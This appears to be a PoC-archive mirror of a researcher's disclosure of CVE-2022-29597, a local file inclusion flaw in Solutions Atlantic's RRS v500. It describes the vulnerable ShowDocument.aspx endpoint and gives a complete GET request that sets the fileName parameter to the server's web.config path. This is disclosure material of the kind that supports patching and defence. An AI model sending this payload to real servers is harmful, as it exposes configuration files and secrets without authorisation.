Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-29597 PoC — Solutions Atlantic Regulatory Reporting System 路径遍历漏洞

Source
https://github.com/TheGetch/CVE-2022-29597
Associated Vulnerability
Title:Solutions Atlantic Regulatory Reporting System 路径遍历漏洞 (CVE-2022-29597)
Description:Solutions Atlantic Regulatory Reporting System(Solutions Atlantic RRS)是美国Solutions Atlantic公司的一个旗舰产品监管报告系统。可自动执行 100 多个司法管辖区的全球股权披露监控和报告工作流程。 Solutions Atlantic Regulatory Reporting System (RRS) v500版本存在安全漏洞,该漏洞源于容易受到本地文件包含 (LFI) 的影响。攻击者利用该漏洞在对 RRSWeb/mai
Description
The RRS v500 application is vulnerable to a Local File Inclusion (LFI) vulnerability.
Readme
# CVE-2022-29597: Local File Inclusion in RSS v500

The [RRS](https://solutions-atlantic.com/regulatory-reporting-system/) v500 application by Solutions Atlantic is vulnerable to a Local File Inclusion (LFI) vulnerability. Any authenticated user has the ability to reference internal system files within requests made to the `/RRSWeb/maint/ShowDocument/ShowDocument.aspx` page. The server will successfully respond with the file contents of the internal system file requested. This ability could allow for adversaries to extract sensitive data and/or files from the underlying file system, gain knowledge about the internal workings of the system, or access source code of the application.

Mitre URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29597

NIST URL: https://nvd.nist.gov/vuln/detail/CVE-2022-29597

## Proof of Concept (POC):

### Show Document Functionality:

**Affected URL:** 

- `/RRSWeb/maint/ShowDocument/ShowDocument.aspx`

While opening or downloading a PDF from the RRS site, a request is made to the affected URL that includes a `fileName` parameter. This parameter could be modified to include an internal system path, such as `web.config`. The server will then serve the file requested. 

**GET request with internal path to web.config:**

```http
GET /RRSWeb/maint/ShowDocument/ShowDocument.aspx?fileName=C:\\Program%20Files\\Solutions%20Atlantic\\RRS\\RRSWeb\\web.config HTTP/1.1
Host: <REDACTED>
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://<REDACTED>/RRSweb/default.aspx
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: _ga=<REDACTED>; ASP.NET_SessionId=<REDACTED>
Connection: Keep-Alive


```

Server Response:

![RRS_LFI_web.config](https://raw.githubusercontent.com/TheGetch/CVE-2022-XXXXX-LFI/main/RRS_LFI_web.config.png)


## Discovery
April 2022
- Eric Getchell - TheGetch
File Snapshot

 [4.0K]  /data/pocs/f7ad655b3725e0eaab137f081a2e62170f497b74
├── [2.1K]  README.md
└── [102K]  RRS_LFI_web.config.png

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.